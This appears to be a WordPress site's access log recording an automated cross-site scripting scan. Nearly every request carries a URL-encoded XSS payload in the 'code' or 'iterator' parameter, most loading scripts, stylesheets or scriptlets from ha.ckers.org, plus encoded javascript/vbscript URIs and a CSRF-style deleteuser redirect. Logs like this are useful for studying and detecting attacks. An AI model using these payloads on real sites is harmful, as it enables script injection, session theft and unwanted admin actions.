/web/
/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba
/web/?code=%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E
/web/?code=%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E
/web/?code=%3COBJECT+TYPE%3D%22text%2Fx-scriptlet%22+DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FOBJECT%3E
/web/?code=%3COBJECT+TYPE%3D%22text%2Fx-scriptlet%22+DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FOBJECT%3E
/web/?code=%3CLINK+REL%3D%22stylesheet%22+HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E
/web/?code=%3CLINK+REL%3D%22stylesheet%22+HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E
/web/?code=%3CMETA+HTTP-EQUIV%3D%22Link%22+Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B+REL%3Dstylesheet%22%3E
/web/?code=%3CMETA+HTTP-EQUIV%3D%22Link%22+Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B+REL%3Dstylesheet%22%3E
/web/?code=%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E
/web/?code=%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E
/web/?code=%3CEMBED+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.swf%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E
/web/?code=%3CEMBED+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.swf%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E
/web/?code=%3CSCRIPT+SRC%3D%2F%2Fha.ckers.org%2F.j%3E
/web/?code=%3CSCRIPT+SRC%3D%2F%2Fha.ckers.org%2F.j%3E
/web/?code=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E
/web/?code=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E
/web/?code=%3CIMG+SRC%3D%22livescript%3A%5Bcode%5D%22%3E
/web/?code=%3CIMG+SRC%3D%22livescript%3A%5Bcode%5D%22%3E
/web/?code=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser
/web/?code=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser
/web/?code=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E
/web/?code=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E
/web/?code=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E
/web/?code=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E
/web/?code=%3CIMG+SRC%3D%27vbscript%3Amsgbox%28%22XSS%22%29%27%3E
/web/?code=%3CIMG+SRC%3D%27vbscript%3Amsgbox%28%22XSS%22%29%27%3E
/web/?code=%3CIFRAME+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html+%3C
/web/?code=%3CIFRAME+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html+%3C
/web/?code=%3C+%253C+%26lt+%26lt%3B+%26LT+%26LT%3B+%26%2360+%26%23060+%26%230060+%26%2300060+%26%23000060+%26%230000060+%26%2360%3B+%26%23060%3B+%26%230060%3B+%26%2300060%3B+%26%23000060%3B+%26%230000060%3B+%26%23x3c+%26%23x03c+%26%23x003c+%26%23x0003c+%26%23x00003c+%26%23x000003c+%26%23x3c%3B+%26%23x03c%3B+%26%23x003c%3B+%26%23x0003c%3B+%26%23x00003c%3B+%26%23x000003c%3B+%26%23X3c+%26%23X03c+%26%23X003c+%26%23X0003c+%26%23X00003c+%26%23X000003c+%26%23X3c%3B+%26%23X03c%3B+%26%23X003c%3B+%26%23X0003c%3B+%26%23X00003c%3B+%26%23X000003c%3B+%26%23x3C+%26%23x03C+%26%23x003C+%26%23x0003C+%26%23x00003C+%26%23x000003C+%26%23x3C%3B+%26%23x03C%3B+%26%23x003C%3B+%26%23x0003C%3B+%26%23x00003C%3B+%26%23x000003C%3B+%26%23X3C+%26%23X03C+%26%23X003C+%26%23X0003C+%26%23X00003C+%26%23X000003C+%26%23X3C%3B+%26%23X03C%3B+%26%23X003C%3B+%26%23X0003C%3B+%26%23X00003C%3B+%26%23X000003C%3B+%5Cx3c+%5Cx3C+%5Cu003c+%5Cu003C
/web/?code=%3C+%253C+%26lt+%26lt%3B+%26LT+%26LT%3B+%26%2360+%26%23060+%26%230060+%26%2300060+%26%23000060+%26%230000060+%26%2360%3B+%26%23060%3B+%26%230060%3B+%26%2300060%3B+%26%23000060%3B+%26%230000060%3B+%26%23x3c+%26%23x03c+%26%23x003c+%26%23x0003c+%26%23x00003c+%26%23x000003c+%26%23x3c%3B+%26%23x03c%3B+%26%23x003c%3B+%26%23x0003c%3B+%26%23x00003c%3B+%26%23x000003c%3B+%26%23X3c+%26%23X03c+%26%23X003c+%26%23X0003c+%26%23X00003c+%26%23X000003c+%26%23X3c%3B+%26%23X03c%3B+%26%23X003c%3B+%26%23X0003c%3B+%26%23X00003c%3B+%26%23X000003c%3B+%26%23x3C+%26%23x03C+%26%23x003C+%26%23x0003C+%26%23x00003C+%26%23x000003C+%26%23x3C%3B+%26%23x03C%3B+%26%23x003C%3B+%26%23x0003C%3B+%26%23x00003C%3B+%26%23x000003C%3B+%26%23X3C+%26%23X03C+%26%23X003C+%26%23X0003C+%26%23X00003C+%26%23X000003C+%26%23X3C%3B+%26%23X03C%3B+%26%23X003C%3B+%26%23X0003C%3B+%26%23X00003C%3B+%26%23X000003C%3B+%5Cx3c+%5Cx3C+%5Cu003c+%5Cu003C
/web/?code=%3CA+HREF%3D%22h+tt+p%3A%2F%2F6%26%2309%3B6.000146.0x7.147%2F%22%3EXSS%3C%2FA%3E
/web/?code=%3CA+HREF%3D%22h+tt+p%3A%2F%2F6%26%2309%3B6.000146.0x7.147%2F%22%3EXSS%3C%2FA%3E
/web/?code=%3CIMG+SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E
/web/?code=%3CIMG+SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E
/web/?code=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E
/web/wp-cron.php?doing_wp_cron=1644491710.4381859302520751953125
/web/?code=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E
/web/?code=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E
/web/?code=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E
/web/?code=%3CXML+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxsstest.xml%22+ID%3DI%3E%3C%2FXML%3E+%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E%3C%2FSPAN%3E
/web/?code=%3CXML+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxsstest.xml%22+ID%3DI%3E%3C%2FXML%3E+%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E%3C%2FSPAN%3E
/web/?code=%3CHTML+xmlns%3Axss%3E+%3C%3Fimport+namespace%3D%22xss%22+implementation%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.htc%22%3E+%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E+%3C%2FHTML%3E
/web/?code=%3CHTML+xmlns%3Axss%3E+%3C%3Fimport+namespace%3D%22xss%22+implementation%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.htc%22%3E+%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E+%3C%2FHTML%3E
/web/?code=%3CA+HREF%3D%22http%3A%2F%2Fgoogle%3Aha.ckers.org%22%3EXSS%3C%2FA%3E
/web/?code=%3CA+HREF%3D%22http%3A%2F%2Fgoogle%3Aha.ckers.org%22%3EXSS%3C%2FA%3E
/web/?code=%3CA+HREF%3D%22http%3A%2F%2F1113982867%2F%22%3EXSS%3C%2FA%3E
/web/?code=%3CA+HREF%3D%22http%3A%2F%2F1113982867%2F%22%3EXSS%3C%2FA%3E
/web/?code=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?code=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?code=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D
/web/?code=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D
/web/?code=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?code=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?code=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?code=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?code=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?code=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?code=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?code=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?code=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?code=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?code=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E
/web/?code=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E
/web/?code=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js
/web/?code=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js
/web/?code=%3CA+HREF%3D%22http%3A%2F%2Fwww.gohttp%3A%2F%2Fwww.google.com%2Fogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?code=%3CA+HREF%3D%22http%3A%2F%2Fwww.gohttp%3A%2F%2Fwww.google.com%2Fogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?code=%3CA+HREF%3D%22http%3A%2F%2Fwww.google.com.%2F%22%3EXSS%3C%2FA%3E
/web/?code=%3CA+HREF%3D%22http%3A%2F%2Fwww.google.com.%2F%22%3EXSS%3C%2FA%3E
/web/?code=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?code=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?code=%3CA+HREF%3D%22http%3A%2F%2Fgoogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?code=%3CA+HREF%3D%22http%3A%2F%2Fgoogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?code=%3CA+HREF%3D%22http%3A%2F%2Fha.ckers.org%40google%22%3EXSS%3C%2FA%3E
/web/?code=%3CA+HREF%3D%22http%3A%2F%2Fha.ckers.org%40google%22%3EXSS%3C%2FA%3E
/web/?code=%3CA+HREF%3D%22%2F%2Fgoogle%22%3EXSS%3C%2FA%3E
/web/?code=%3CA+HREF%3D%22%2F%2Fgoogle%22%3EXSS%3C%2FA%3E
/web/?code=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E
/web/?code=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E
/web/?code=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E
/web/?code=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E
/web/?code=%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E
/web/?code=%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E
/web/?code=%3CA+HREF%3D%22http%3A%2F%2F0102.0146.0007.00000223%2F%22%3EXSS%3C%2FA%3E
/web/?code=%3CA+HREF%3D%22http%3A%2F%2F0102.0146.0007.00000223%2F%22%3EXSS%3C%2FA%3E
/web/?code=%3CIMG+SRC%3D%22mocha%3A%5Bcode%5D%22%3E
/web/?code=%3CIMG+SRC%3D%22mocha%3A%5Bcode%5D%22%3E
/web/?code=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E
/web/?code=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E
/web/?iterator=%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E
/web/?iterator=%3COBJECT+TYPE%3D%22text%2Fx-scriptlet%22+DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FOBJECT%3E
/web/?iterator=%3COBJECT+TYPE%3D%22text%2Fx-scriptlet%22+DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FOBJECT%3E
/web/?iterator=%3CLINK+REL%3D%22stylesheet%22+HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E
/web/?iterator=%3CLINK+REL%3D%22stylesheet%22+HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E
/web/?iterator=%3CMETA+HTTP-EQUIV%3D%22Link%22+Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B+REL%3Dstylesheet%22%3E
/web/?iterator=%3CMETA+HTTP-EQUIV%3D%22Link%22+Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B+REL%3Dstylesheet%22%3E
/web/?iterator=%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E
/web/?iterator=%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E
/web/?iterator=%3CEMBED+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.swf%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E
/web/?iterator=%3CEMBED+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.swf%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E
/web/?iterator=%3CSCRIPT+SRC%3D%2F%2Fha.ckers.org%2F.j%3E
/web/?iterator=%3CSCRIPT+SRC%3D%2F%2Fha.ckers.org%2F.j%3E
/web/?iterator=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E
/web/?iterator=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E
/web/?iterator=%3CIMG+SRC%3D%22livescript%3A%5Bcode%5D%22%3E
/web/?iterator=%3CIMG+SRC%3D%22livescript%3A%5Bcode%5D%22%3E
/web/?iterator=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser
/web/?iterator=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E
/web/?iterator=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E
/web/?iterator=%3CIMG+SRC%3D%27vbscript%3Amsgbox%28%22XSS%22%29%27%3E
/web/?iterator=%3CIMG+SRC%3D%27vbscript%3Amsgbox%28%22XSS%22%29%27%3E
/web/?iterator=%3CIFRAME+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html+%3C
/web/?iterator=%3CIFRAME+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html+%3C
/web/?iterator=%3C+%253C+%26lt+%26lt%3B+%26LT+%26LT%3B+%26%2360+%26%23060+%26%230060+%26%2300060+%26%23000060+%26%230000060+%26%2360%3B+%26%23060%3B+%26%230060%3B+%26%2300060%3B+%26%23000060%3B+%26%230000060%3B+%26%23x3c+%26%23x03c+%26%23x003c+%26%23x0003c+%26%23x00003c+%26%23x000003c+%26%23x3c%3B+%26%23x03c%3B+%26%23x003c%3B+%26%23x0003c%3B+%26%23x00003c%3B+%26%23x000003c%3B+%26%23X3c+%26%23X03c+%26%23X003c+%26%23X0003c+%26%23X00003c+%26%23X000003c+%26%23X3c%3B+%26%23X03c%3B+%26%23X003c%3B+%26%23X0003c%3B+%26%23X00003c%3B+%26%23X000003c%3B+%26%23x3C+%26%23x03C+%26%23x003C+%26%23x0003C+%26%23x00003C+%26%23x000003C+%26%23x3C%3B+%26%23x03C%3B+%26%23x003C%3B+%26%23x0003C%3B+%26%23x00003C%3B+%26%23x000003C%3B+%26%23X3C+%26%23X03C+%26%23X003C+%26%23X0003C+%26%23X00003C+%26%23X000003C+%26%23X3C%3B+%26%23X03C%3B+%26%23X003C%3B+%26%23X0003C%3B+%26%23X00003C%3B+%26%23X000003C%3B+%5Cx3c+%5Cx3C+%5Cu003c+%5Cu003C
/web/?iterator=%3C+%253C+%26lt+%26lt%3B+%26LT+%26LT%3B+%26%2360+%26%23060+%26%230060+%26%2300060+%26%23000060+%26%230000060+%26%2360%3B+%26%23060%3B+%26%230060%3B+%26%2300060%3B+%26%23000060%3B+%26%230000060%3B+%26%23x3c+%26%23x03c+%26%23x003c+%26%23x0003c+%26%23x00003c+%26%23x000003c+%26%23x3c%3B+%26%23x03c%3B+%26%23x003c%3B+%26%23x0003c%3B+%26%23x00003c%3B+%26%23x000003c%3B+%26%23X3c+%26%23X03c+%26%23X003c+%26%23X0003c+%26%23X00003c+%26%23X000003c+%26%23X3c%3B+%26%23X03c%3B+%26%23X003c%3B+%26%23X0003c%3B+%26%23X00003c%3B+%26%23X000003c%3B+%26%23x3C+%26%23x03C+%26%23x003C+%26%23x0003C+%26%23x00003C+%26%23x000003C+%26%23x3C%3B+%26%23x03C%3B+%26%23x003C%3B+%26%23x0003C%3B+%26%23x00003C%3B+%26%23x000003C%3B+%26%23X3C+%26%23X03C+%26%23X003C+%26%23X0003C+%26%23X00003C+%26%23X000003C+%26%23X3C%3B+%26%23X03C%3B+%26%23X003C%3B+%26%23X0003C%3B+%26%23X00003C%3B+%26%23X000003C%3B+%5Cx3c+%5Cx3C+%5Cu003c+%5Cu003C
/web/?iterator=%3CA+HREF%3D%22h+tt+p%3A%2F%2F6%26%2309%3B6.000146.0x7.147%2F%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CA+HREF%3D%22h+tt+p%3A%2F%2F6%26%2309%3B6.000146.0x7.147%2F%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CIMG+SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E
/web/?iterator=%3CIMG+SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E
/web/?iterator=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E
/web/?iterator=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E
/web/?iterator=%3CXML+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxsstest.xml%22+ID%3DI%3E%3C%2FXML%3E+%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E%3C%2FSPAN%3E
/web/?iterator=%3CXML+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxsstest.xml%22+ID%3DI%3E%3C%2FXML%3E+%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E%3C%2FSPAN%3E
/web/?iterator=%3CHTML+xmlns%3Axss%3E+%3C%3Fimport+namespace%3D%22xss%22+implementation%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.htc%22%3E+%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E+%3C%2FHTML%3E
/web/?iterator=%3CHTML+xmlns%3Axss%3E+%3C%3Fimport+namespace%3D%22xss%22+implementation%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.htc%22%3E+%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E+%3C%2FHTML%3E
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2Fgoogle%3Aha.ckers.org%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2Fgoogle%3Aha.ckers.org%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2F1113982867%2F%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2F1113982867%2F%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?iterator=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?iterator=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D
/web/?iterator=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D
/web/?iterator=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?iterator=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?iterator=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/wp-cron.php?doing_wp_cron=1644495293.5372030735015869140625
/web/?iterator=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?iterator=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?iterator=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?iterator=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?iterator=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?iterator=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?iterator=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?iterator=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E
/web/?iterator=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E
/web/?iterator=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js
/web/?iterator=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2Fwww.gohttp%3A%2F%2Fwww.google.com%2Fogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2Fwww.gohttp%3A%2F%2Fwww.google.com%2Fogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2Fwww.google.com.%2F%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2Fwww.google.com.%2F%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?iterator=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2Fgoogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2Fgoogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2Fha.ckers.org%40google%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CA+HREF%3D%22http%3A%2F%2Fha.ckers.org%40google%22%3EXSS%3C%2FA%3E
/web/?iterator=%3CA+HREF%3D%22%2F%2Fgoogle%22%3EXSS%3C%2FA%3E
